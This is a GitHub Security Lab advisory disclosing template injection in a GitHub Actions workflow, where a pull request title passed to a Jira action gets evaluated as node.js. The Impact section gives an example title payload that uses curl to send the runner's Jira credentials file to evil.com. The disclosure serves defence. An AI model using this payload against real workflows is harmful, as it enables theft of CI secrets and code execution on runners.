GHSL-2020-211: Template injection in a GitHub workflow of namin2/dependabot_jira repository

Summary

The GitHub workflow template in namin2/dependabot_jira repository is vulnerable to template injection from user comments.

Product

namin2/dependabot_jira repository

Tested Version

Master branch.

Details

Issue: Hidden expression expansion of input parameters passed to atlassian/gajira-create

Create Jira Issue step in dependabot_jira.yml workflow is vulnerable to template injection.

The ${{ github.event.pull_request.title }} is used to format input values to atlassian/gajira-create action:

    - name: Create Jira Issue
      id: create
      uses: atlassian/gajira-create@v2.0.0
      with:
        project: ${{ env.JIRA_PROJECT }}
        issuetype: ${{ env.JIRA_ISSUE_TYPE }}
        summary: |
          [${{github.event.repository.name }}] ${{github.event.pull_request.title }}
        description: |
          ${{github.event.pull_request.html_url }}

The action has a hidden feature - it expands {{}} internally. This way when the pull request title contains an expression in double curly braces it is evaluated by node.js in these actions.

Impact

This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may create a pull request with the title:

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the title later.

Coordinated Disclosure Timeline

• 10/29/2020: Report sent to vendor
• 11/05/2020: Issue resolved

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-211 in any communication regarding this issue.